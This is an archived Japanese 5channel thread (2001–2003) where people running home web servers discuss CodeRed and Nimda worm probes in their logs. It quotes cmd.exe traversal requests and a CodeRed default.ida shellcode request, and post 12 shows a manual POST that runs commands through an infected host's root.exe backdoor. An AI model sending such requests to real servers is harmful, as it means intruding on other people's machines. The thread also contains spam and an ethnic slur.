5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

おーい!自宅でWebサーバ立ててるやつー!IIS

1 :増殖中・・・:01/09/22 23:21
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
CodeRedってWormらしいが、
GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 218
GET /MSADC/root.exe?/c+dir HTTP/1.1" 404 252
ってログが残ってるんだが、なんなんだー!?
これもWormか??
IIS使ってないが、ものすごく気になる気になる。

2 :名無しさん@お腹いっぱい。:01/09/22 23:22
このスレの上下のスレでも読めや。

3 :糞スレ増殖中・・・:01/09/22 23:23
回線切れ。

4 :名無しさん@お腹いっぱい。:01/09/22 23:24
にむだだよ。
マックでサーバ立ててる基地外の漏れとしては
どこ吹く風、って感じだが。

5 :名無しさん@お腹いっぱい。:01/09/22 23:27
どうでもいいが
>CodeRedってWormらしいが、
>これもWormか??
ってなんか変!!

6 :増殖中・・・:01/09/22 23:32
これがにむだだったのね。スマソスマソ

>>5
CodeRedって言うの名の

7 :まっか:01/09/22 23:40
マックは感染しなくとも、中継に使われる。
安心するのは早いであるです。

8 :まっかっか:01/09/23 00:23
>>7
その手の情報って、ほんと少ないし、
あってもまっかは対岸の火としか見てないよね。

9 : :01/09/23 01:30
キムチ、いい加減気付いてくれ。お前からの攻撃がうざくて仕方がない。
http://210.216.41.72/scripts/root.exe?/c+dir%20e:\winnt

10 :名無しさん@お腹いっぱい。:01/09/23 01:51
GET 〜 の後ろが 404とか 500ならいいけど、
200を返していたらあなたの マシンもニムダに感染している可能性がある。

11 :名無しさん@お腹いっぱい。:01/09/23 01:52
>>1
http://www.geocities.co.jp/Milano-Killer/6419/1.swf

12 :名無しさん@お腹いっぱい。:01/09/23 01:59
CodeRedがまた目立ってきた。
仕掛けてくる相手には root.exeがあるはずだから、こうしてやる。

telnet ***.***.***.*** 80
POST /scripts/root.exe HTTP/1.0
Content-Length: 69

NET SEND * "*** Your Server seems to be cracked by CodeRed !!"
dir

13 :名無しさん@お腹いっぱい。:01/09/23 02:02
>>12
ネタ?
telnetはいらないじゃん。

14 :名無しさん@お腹いっぱい。:01/09/23 02:31
>>13
おまえこそネタ?
telnet 80 なしでどうやって相手につなぐのよ。

15 :名無しさん@お腹いっぱい。:01/09/23 02:36
UNIX上のコンソール端末の話?

16 :名無しさん@お腹いっぱい。:01/09/23 02:50
telnetってものがどういうものかわかってない人間が約一名いるな。
よく知らないものに対し、「ネタ?」とか言うのはやめたほうがいいぞ

17 :名無しさん@お腹いっぱい。 :01/09/23 03:20
telnet 80 とコマンドラインで入力する以外に
tcpポート80へ接続する方法はないのか?

ブラウザもtelnet 80を使ってるのか?

コマンドとプロトコルの区別ついてる?

18 : :01/09/23 03:31
>>17
御意. さらし上げたら?

19 :名無しさん@お腹いっぱい。:01/09/23 05:21
ネットワーク系のテストする時などに任意のポートに繋いで操作するのに
telnet コマンドを使うのってunix屋なら常識だと思うが。

httpdとお話できるようになって一人前かな

20 :名無しさん@お腹いっぱい。:01/09/23 05:34
つまりこうすれば良かったんだよ

TCPポートの80開きたいんだけど ***.***.***.*** 80
POST /scripts/root.exe HTTP/1.0
Content-Length: 69

NET SEND * "*** Your Server seems to be cracked by CodeRed !!"
dir

「TCPポートの80開きたいんだけど」コマンドが重要。

21 :名無しさん@お腹いっぱい。:01/09/23 05:44
>>17
>>12はごく一般的だと思うが。
それとも>>17はコレをやるのにいちいちブラウザ使うのか?

22 :名無しさん@お腹いっぱい。:01/09/23 07:37
晒しage

23 :このスレ痛い・・・:01/09/23 08:14
全て>>1の責任だ!
http://www.geocities.co.jp/Milano-Killer/6419/1.swf

24 :名無しさん@お腹いっぱい。:01/09/23 08:33
http://isweb33.infoseek.co.jp/play/liloatx/yoshi.html

25 :名無しさん@お腹いっぱい。:01/09/23 09:04
>>24
腹が痛い

26 ::01/09/23 11:53
[23/Sep/2001:08:43:57 +0900]
[23/Sep/2001:09:19:19 +0900]
[23/Sep/2001:09:25:01 +0900] .
[23/Sep/2001:09:57:14 +0900]
[23/Sep/2001:10:17:53 +0900]
[23/Sep/2001:10:41:00 +0900]
[23/Sep/2001:10:52:06 +0900] .
[23/Sep/2001:10:56:24 +0900]
[23/Sep/2001:10:59:05 +0900] .
[23/Sep/2001:11:17:27 +0900]
[23/Sep/2001:11:23:37 +0900]
[23/Sep/2001:11:31:53 +0900]
[23/Sep/2001:11:32:01 +0900] .
[23/Sep/2001:11:48:23 +0900]

この2、3時間の間にきたCodeRed
おさまらんのう。。

27 :名無しさん@お腹いっぱい。:01/09/23 15:41
>>19
>httpdとお話できるようになって一人前かな

そんな一人前はいらんちゅーねん。

28 :名無しさん@お腹いっぱい。:01/09/24 02:36
そんなことより聞いてくれよ>>httpdよ。

29 :名無しさん@お腹いっぱい。:01/09/24 02:47
つーかGETはともかく、POSTはtelnet系ツールが当たり前だな

30 :名無しさん@お腹いっぱい:01/09/24 05:10
なんとか 代 白
[2001/09/24 3:58:10] --unknown-- from: 202.132.46.28 /
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:38] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 5:07:52] --unknown-- from: 202.29.26.20 /
[2001/09/24 5:07:57] --unknown-- from: 202.29.26.20 /

31 :名無しさん@お腹いっぱい。:01/09/24 05:21
telnetめんどーだし、netcatもあるよね

32 :名無しさん@お腹いっぱい。:01/09/24 20:33
 telnetマニアの方々へ質問があります。

(1)12のように、コマンドをPOSTで送っても
   root.exeは順次それを実行できるのですか?
(2)サーバと会話するのにHTTP1.1を使わないのはなぜですか?
   切られちゃうじゃないですか?

33 :名無しさん@お腹いっぱい。:01/09/25 13:47
>>32
POSTで送って実行できるかどうかは相手次第なんだが、
実験してみてはどうかな。
HTTP1.1を使わない→切られちゃう ってのは、 Keep-Alive が
使えない、ということかな。
HTTP1.1を使うのは何かと面倒だから、HTTP1.0を使うのよん。
確かに一回のリクエスト→応答単位で切れるけど。目的は達成
できるでしょう。

ポートと直接ゴニョゴニョするためにTelnet使うんだったら、おすすめは
MSのWindowsについてくるTelnet。余計なこと一切しないから。
Telnet端末としては最低だけど、ツールとしては便利

ソケット直接たたいて、ポートと会話するプログラムとか書いて見るのも
入門としてお勧めだぞ。ツール作成の第一歩だ。

別にTelnetマニアじゃないけどね。

34 :先行者キャノン  :01/09/25 13:50
便所にいきたい。

35 :先行者キャノン  :01/09/25 13:50
小便したいぜ

36 :先行者キャノン  :01/09/25 13:50
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。

37 :先行者キャノン  :01/09/25 13:51
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。

38 :先行者キャノン  :01/09/25 13:55
>>20

は馬鹿か?何いいたいのかわからん。

telnet 80
でいいだろ。ひとまずテストすんなら。

>>20 は、
おまえ本当に大馬鹿エタ、ヒニン、チョンコウだな

39 :名無しさん@お腹いっぱい。:01/09/25 13:59
>>38

なかなか的確な突っ込みを入れている姿を見て、
ちょっと関心してたけど、あちらこちらの書き込みで
君も結局…なことがわかったよ。
買いかぶった俺が馬鹿なのだが。残念だ。

40 :無月:01/09/25 15:10
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
CodeRedが攻撃してくるとwebサービスをしてる以上
ログにあがってくるよ、ウェブサバーは要求された
ファイルがないので「そんなファイルなぃすっ!」
って答えてるんです。一応聞かれたことをlogに出してます。

41 :名無しさん@お腹いっぱい。:01/09/25 18:39
>>38

可哀想に、よほど痛かったらしい。
みじめ。

42 :名無しさん@お腹いっぱい。:01/09/25 19:26
先行者キャノンてレベル高いの?
書いてること見たら丸出しなんだけど。
他人?

43 :名無しさん@お腹いっぱい。:01/09/25 19:28
少なくとも人間的レベルは低い

44 :名無しさん@お腹いっぱい。:01/09/25 22:10
ネタにマジ煽りするあたりはアホ(プッ

45 :名無しさん@お腹いっぱい。:01/09/25 23:50
不自由な人

46 :素直に捨てろ:01/09/26 17:17

●ZDNN:IISは捨てなさい――Gartnerが企業に警告
http://www.zdnet.co.jp/news/0109/26/e_iis.html

●CNET Japan Tech News:ワーム対策の第一歩はMS『IIS』の使用中止
http://japan.cnet.com/News/2001/Item/010926-2.html?mn

47 :名無しさん@お腹いっぱい。:01/09/26 18:04
いまさら「先行者キャノン」と名乗ってうれしがるような人。
きっと、きのうきょう先行者を知ったのでしょう。

48 :名無しさん@お腹いっぱい。:02/01/01 09:25
新年あけましておめでとう

49 :名無しさん@お腹いっぱい。:02/02/13 02:36
こちらこそ!

50 :名無しさん@お腹いっぱい。:02/02/17 03:08
IIS

51 :名無しさん@お腹いっぱい。:02/02/17 07:44
>>48-50
ねぎ食ってるか?

52 :名無しさん@お腹いっぱい。:02/02/23 06:11
IISからAN HTTPDに乗り換えますた

53 :名無しさん@お腹いっぱい。:02/03/02 04:23
age

54 :名無しさん@お腹いっぱい。:02/03/02 15:14
IIS のFTPD機能を使っているんですが
warftpみたいに接続状態を知ることってできないんですか?

55 :名無しさん@お腹いっぱい。:02/08/29 05:58
今考えると>>2のコノスレの上下ってかなりアバウトなアドバイスだった。
よくわかったな、自分。

56 :名無しさん@お腹いっぱい。:02/09/04 01:15
いまだにくるんだけどなんで?

57 :名無しさん@お腹いっぱい。:02/09/04 02:25
172.16.54.75 こいつうぜーよさっきから

2002/09/04(01:24:13) W-SV 172.16.54.75 [80] --- 0 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] E200034 "利用者リストでアクセスが拒否されました [ 172.16.54.75 ]"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] --- 0 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] E200034 "利用者リストでアクセスが拒否されました [ 172.16.54.75 ]"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] --- 0 "GET /scripts/..タ/../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] E200034 "利用者リストでアクセスが拒否されました [ 172.16.54.75 ]"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] --- 0 "GET /scripts/..タッ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2002/09/04(01:24:15) W-SV 172.16.54.75 [80] E200034 "利用者リストでアクセスが拒否されました [ 172.16.54.75 ]"


58 :名無しさん@お腹いっぱい。:02/10/11 00:04
それ基本・・

59 :名無しさん@お腹いっぱい。:02/10/11 00:05
おせえよ

60 :名無しさん@お腹いっぱい。:02/11/09 09:13
 

61 :山崎渉:03/01/15 16:01
(^^)

62 :山崎渉:03/01/16 04:02
(^^)

63 :名無しさん@お腹いっぱい。:03/01/27 01:56
WWWとFTPサーバを立てているんですが、IPから直接HTTPやFTPにアクセスされるのが嫌なので、IPからの直接アクセスを拒否することは出来ますか?
ちなみにIIS5.1です。

64 :名無しさん@お腹いっぱい。:03/01/27 03:32
LANカードにプライベートアドレスもう一個振って、
WWWとFTPをそれのみにバインドすれば
プライベートLANからのみアクセス可能な鯖の出来上がり。

65 :山崎渉:03/04/17 12:29
(^^)

66 :山崎渉:03/04/20 06:08
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

67 :山崎渉:03/05/22 02:12
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

68 :山崎渉:03/05/28 17:09
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

69 :名無しさん@お腹いっぱい。:03/06/26 10:01
210.73.54.193 - - [2003/06/26 (Thu) 09:16:44] "CONNECT 65.54.253.230:25 HTTP/1.1" 403 274 "-" "-"
210.99.211.124 - - [2003/06/26 (Thu) 09:17:41] "GET /default.ida?X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 403 285 "-" "-"


70 :山崎 渉:03/07/15 11:17

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

71 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:07
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

72 :山崎 渉:03/08/15 23:16
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

73 :名無しさん@お腹いっぱい。:03/09/04 00:45
test

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)